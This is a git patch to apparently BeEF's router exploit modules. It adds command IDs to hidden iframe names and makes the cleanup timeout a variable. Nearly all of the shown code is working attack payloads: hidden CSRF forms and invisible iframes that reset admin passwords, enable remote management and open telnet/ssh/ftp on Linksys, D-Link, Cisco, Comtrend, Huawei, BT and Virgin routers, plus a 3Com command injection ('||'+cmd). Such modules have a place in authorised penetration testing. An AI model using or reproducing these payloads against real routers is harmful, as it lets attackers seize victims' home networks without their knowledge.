From 639d0611a63074262a8e20915079b095df1d4e70 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 27 May 2013 11:56:01 +0930 Subject: [PATCH] Add `command_id` to embedded iframe/img IDs for router exploits This prevents a race condition where duplicate iframes/imgs are created if a module is run twice simultaneously. The second iframe/img was not being removed during `cleanup()`. --- .../3com_officeconnect_cmd_exec/command.js | 7 ++-- .../router/asmax_ar804gu_cmd_exec/command.js | 2 +- .../router/bt_home_hub_csrf/command.js | 18 +++++----- .../router/cisco_e2400_csrf/command.js | 11 +++--- .../router/comtrend_ct5367_csrf/command.js | 17 +++++----- .../router/comtrend_ct5624_csrf/command.js | 17 +++++----- .../router/dlink_dir_615_csrf/command.js | 7 ++-- .../router/dlink_dsl500t_csrf/command.js | 9 ++--- .../router/huawei_smartax_mt880/command.js | 13 +++---- .../router/linksys_befsr41_csrf/command.js | 10 +++--- .../router/linksys_wrt54g2_csrf/command.js | 11 +++--- .../router/linksys_wrt54g_csrf/command.js | 34 ++++++++++--------- .../router/virgin_superhub_csrf/command.js | 25 +++++++------- 13 files changed, 97 insertions(+), 84 deletions(-) diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js index 0c96f5688..5f36c9bd6 100644 --- a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js +++ b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js @@ -9,8 +9,9 @@ beef.execute(function() { var gateway = '<%= @base %>'; var path = 'utility.cgi'; var cmd = '<%= @cmd %>'; + var timeout = 15; - var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [ + var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [ {'type':'hidden', 'name':'testType', 'value':'1'}, {'type':'hidden', 'name':'IP', 'value':'||'+cmd} ]); @@ -18,9 +19,9 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(com_officeconnect_iframe); + document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js index d0417c2fb..9a7da976c 100644 --- a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js +++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js @@ -14,7 +14,7 @@ beef.execute(function() { img.setAttribute("style","visibility:hidden"); img.setAttribute("width","0"); img.setAttribute("height","0"); - img.id = 'asmax_ar804gu'; + img.id = 'asmax_ar804gu_<%= @command_id %>'; img.src = gateway+path+cmd; document.body.appendChild(img); diff --git a/modules/exploits/router/bt_home_hub_csrf/command.js b/modules/exploits/router/bt_home_hub_csrf/command.js index 7cb16cccd..2ab008044 100644 --- a/modules/exploits/router/bt_home_hub_csrf/command.js +++ b/modules/exploits/router/bt_home_hub_csrf/command.js @@ -6,21 +6,21 @@ beef.execute(function() { var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - - - var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", - [{'type':'hidden', 'name':'0', 'value':'31'} , - {'type':'hidden', 'name':'1', 'value':''}, - {'type':'hidden', 'name':'30', 'value':passwd}]); + var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", [ + {'type':'hidden', 'name':'0', 'value':'31'} , + {'type':'hidden', 'name':'1', 'value':''}, + {'type':'hidden', 'name':'30', 'value':passwd} + ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(bt_home_hub_iframe); + document.body.removeChild(bt_home_hub_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/cisco_e2400_csrf/command.js b/modules/exploits/router/cisco_e2400_csrf/command.js index fc226fa83..3a807e582 100644 --- a/modules/exploits/router/cisco_e2400_csrf/command.js +++ b/modules/exploits/router/cisco_e2400_csrf/command.js @@ -7,8 +7,9 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; + var timeout = 15; - var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", + var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", [ {'type':'hidden', 'name':'submit_button', 'value':'Management'}, {'type':'hidden', 'name':'change_action', 'value':''}, @@ -37,7 +38,7 @@ beef.execute(function() { {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'}, ]); - var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", + var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", [ {'type':'hidden', 'name':'submit_button', 'value':'Firewall'}, {'type':'hidden', 'name':'change_action', 'value':''}, @@ -59,10 +60,10 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(cisco_e2400_iframe1); - document.body.removeChild(cisco_e2400_iframe2); + document.body.removeChild(cisco_e2400_iframe1_<%= @command_id %>); + document.body.removeChild(cisco_e2400_iframe2_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js index ec750b7e3..b9917bf6a 100644 --- a/modules/exploits/router/comtrend_ct5367_csrf/command.js +++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js @@ -6,12 +6,13 @@ beef.execute(function() { var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var ct5367_iframe1 = beef.dom.createInvisibleIframe(); - ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); + var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe(); + ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); - var ct5367_iframe2 = beef.dom.createInvisibleIframe(); + var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe(); var form = document.createElement('form'); form.setAttribute('action', gateway + "password.cgi"); @@ -37,16 +38,16 @@ beef.execute(function() { input.setAttribute('value', passwd); form.appendChild(input); - ct5367_iframe2.contentWindow.document.body.appendChild(form); + ct5367_iframe2_<%= @command_id %>.contentWindow.document.body.appendChild(form); form.submit(); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(ct5367_iframe1); - document.body.removeChild(ct5367_iframe2); + document.body.removeChild(ct5367_iframe1_<%= @command_id %>); + document.body.removeChild(ct5367_iframe2_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js index 1b740b447..08ecf84ae 100644 --- a/modules/exploits/router/comtrend_ct5624_csrf/command.js +++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js @@ -6,21 +6,22 @@ beef.execute(function() { var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var ct5367_iframe1 = beef.dom.createInvisibleIframe(); - ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); + var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe(); + ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3'); - var ct5367_iframe2 = beef.dom.createInvisibleIframe(); - ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd); + var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe(); + ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(ct5367_iframe1); - document.body.removeChild(ct5367_iframe2); + document.body.removeChild(ct5367_iframe1_<%= @command_id %>); + document.body.removeChild(ct5367_iframe2_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/dlink_dir_615_csrf/command.js b/modules/exploits/router/dlink_dir_615_csrf/command.js index 3adb3b1fe..8c7fd4599 100644 --- a/modules/exploits/router/dlink_dir_615_csrf/command.js +++ b/modules/exploits/router/dlink_dir_615_csrf/command.js @@ -7,8 +7,9 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; + var timeout = 15; - var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST", + var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST", [{'type':'hidden', 'name':'ACTION_POST', 'value':'1'} , {'type':'hidden', 'name':'apply', 'value':'Save Settings'}, {'type':'hidden', 'name':'admin_name', 'value':'admin'}, @@ -23,9 +24,9 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(dir615_iframe); + document.body.removeChild(dir615_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js index f546bb08a..c48624322 100644 --- a/modules/exploits/router/dlink_dsl500t_csrf/command.js +++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js @@ -6,9 +6,10 @@ beef.execute(function() { var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", + var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} , {'type':'hidden', 'name':'security:settings/username', 'value':'admin'}, {'type':'hidden', 'name':'security:settings/password', 'value':passwd}, @@ -19,9 +20,9 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(dsl500t_iframe); + document.body.removeChild(dsl500t_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js index 9ce6b9f2e..09667bd04 100644 --- a/modules/exploits/router/huawei_smartax_mt880/command.js +++ b/modules/exploits/router/huawei_smartax_mt880/command.js @@ -5,19 +5,20 @@ // beef.execute(function() { - var gateway = '<%= @base %>'; + var gateway = '<%= @base %>'; var username = '<%= @username %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe(); - huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70"); + var huawei_smartax_mt880_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); + huawei_smartax_mt880_iframe_<%= @command_id %>.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(huawei_smartax_mt880_iframe); + document.body.removeChild(huawei_smartax_mt880_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/linksys_befsr41_csrf/command.js b/modules/exploits/router/linksys_befsr41_csrf/command.js index 6580abf95..60cee7e6c 100644 --- a/modules/exploits/router/linksys_befsr41_csrf/command.js +++ b/modules/exploits/router/linksys_befsr41_csrf/command.js @@ -5,15 +5,17 @@ // beef.execute(function() { + var timeout = 15; + + var befsr41_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); + befsr41_iframe_<%= @command_id %>.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0'); - var befsr41_iframe = beef.dom.createInvisibleIframe(); - befsr41_iframe.setAttribute('src', '<%= @base %>Gozila.cgi?PasswdModify=1&sysPasswd=<%= @password %>&sysPasswdConfirm=<%= @password %>&Remote_Upgrade=1&Remote_Management=1&RemotePort=<%= @port %>&UPnP_Work=0'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(befsr41_iframe); + document.body.removeChild(befsr41_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/command.js b/modules/exploits/router/linksys_wrt54g2_csrf/command.js index 3eb5248e8..5b1097a45 100644 --- a/modules/exploits/router/linksys_wrt54g2_csrf/command.js +++ b/modules/exploits/router/linksys_wrt54g2_csrf/command.js @@ -5,11 +5,12 @@ // beef.execute(function() { - var port = '<%= @port %>'; + var port = '<%= @port %>'; var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST", + var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST", [{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} , {'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'}, {'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'}, @@ -27,9 +28,9 @@ beef.execute(function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(wrt54g2_iframe); + document.body.removeChild(wrt54g2_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/linksys_wrt54g_csrf/command.js b/modules/exploits/router/linksys_wrt54g_csrf/command.js index c235e32a2..668315b6e 100644 --- a/modules/exploits/router/linksys_wrt54g_csrf/command.js +++ b/modules/exploits/router/linksys_wrt54g_csrf/command.js @@ -5,31 +5,33 @@ // beef.execute(function() { - var port = '<%= @port %>'; + var port = '<%= @port %>'; var gateway = '<%= @base %>'; - var passwd = '<%= @password %>'; + var passwd = '<%= @password %>'; + var timeout = 15; - var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST", - [{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} , - {'type':'hidden', 'name':'http_enable', 'value':'1'}, - {'type':'hidden', 'name':'https_enable', 'value':'0'}, - {'type':'hidden', 'name':'PasswdModify', 'value':'1'}, - {'type':'hidden', 'name':'http_passwd', 'value':passwd}, + var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST", + [ + {'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} , + {'type':'hidden', 'name':'http_enable', 'value':'1'}, + {'type':'hidden', 'name':'https_enable', 'value':'0'}, + {'type':'hidden', 'name':'PasswdModify', 'value':'1'}, + {'type':'hidden', 'name':'http_passwd', 'value':passwd}, {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd}, - {'type':'hidden', 'name':'_http_enable', 'value':'1'}, - {'type':'hidden', 'name':'remote_management', 'value':'1'}, - {'type':'hidden', 'name':'web_wl_filter', 'value':'1'}, - {'type':'hidden', 'name':'http_wanport', 'value':port}, - {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, - {'type':'hidden', 'name':'layout', 'value':'en'} + {'type':'hidden', 'name':'_http_enable', 'value':'1'}, + {'type':'hidden', 'name':'remote_management', 'value':'1'}, + {'type':'hidden', 'name':'web_wl_filter', 'value':'1'}, + {'type':'hidden', 'name':'http_wanport', 'value':port}, + {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, + {'type':'hidden', 'name':'layout', 'value':'en'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(wrt54g_iframe); + document.body.removeChild(wrt54g_iframe_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); }); diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js index ca60fc0e9..5c5e94b94 100644 --- a/modules/exploits/router/virgin_superhub_csrf/command.js +++ b/modules/exploits/router/virgin_superhub_csrf/command.js @@ -9,30 +9,31 @@ beef.execute(function() { var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var port = '<%= @port %>'; + var timeout = 15; - var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [ - {'type':'hidden', 'name':'NetgearPassword', 'value':passwd}, + var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [ + {'type':'hidden', 'name':'NetgearPassword', 'value':passwd}, {'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd}, - {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'} + {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'} ]); - var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [ - {'type':'hidden', 'name':'cbPortScanDetection', 'value':''} + var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [ + {'type':'hidden', 'name':'cbPortScanDetection', 'value':''} ]); - var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [ - {'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'}, - {'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port} + var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [ + {'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'}, + {'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { - document.body.removeChild(virgin_superhub_iframe1); - document.body.removeChild(virgin_superhub_iframe2); - document.body.removeChild(virgin_superhub_iframe3); + document.body.removeChild(virgin_superhub_iframe1_<%= @command_id %>); + document.body.removeChild(virgin_superhub_iframe2_<%= @command_id %>); + document.body.removeChild(virgin_superhub_iframe3_<%= @command_id %>); } - setTimeout("cleanup()", 15000); + setTimeout("cleanup()", timeout*1000); });